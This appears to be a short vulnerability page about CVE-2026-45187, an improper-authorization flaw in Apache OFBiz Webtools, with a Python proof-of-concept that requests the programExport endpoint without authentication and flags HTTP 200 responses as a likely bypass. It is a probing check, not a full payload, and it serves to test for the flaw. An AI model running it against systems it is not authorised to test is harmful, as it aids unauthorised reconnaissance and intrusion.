CVE-2026-45187 Apache OFBiz Webtools不当授权漏洞

import requests def check_cve_2026_45187(target_url): """ PoC for CVE-2026-45187: Improper Authorization in Apache OFBiz Webtools This script attempts to access a protected Webtools endpoint without authentication. """ # Common vulnerable endpoint path in OFBiz Webtools # Note: The actual vulnerable endpoint might vary based on configuration. endpoint = "/webtools/control/programExport" full_url = f"{target_url}{endpoint}" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: # Send request without authentication cookies or headers response = requests.get(full_url, headers=headers, timeout=10, allow_redirects=False) # Check if response indicates successful unauthorized access (e.g., HTTP 200 OK) # Often a redirect (302) to login indicates protection, while 200 might indicate bypass. if response.status_code == 200 and "ofbiz" in response.text.lower(): print(f"[+] Potential Vulnerability Detected!") print(f" Target: {full_url}") print(f" Status Code: {response.status_code}") print(f" Response Length: {len(response.text)} bytes") return True else: print(f"[-] Target does not appear to be vulnerable. Status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python poc.py <target_url>") print("Example: python poc.py http://localhost:8080") else: check_cve_2026_45187(sys.argv[1])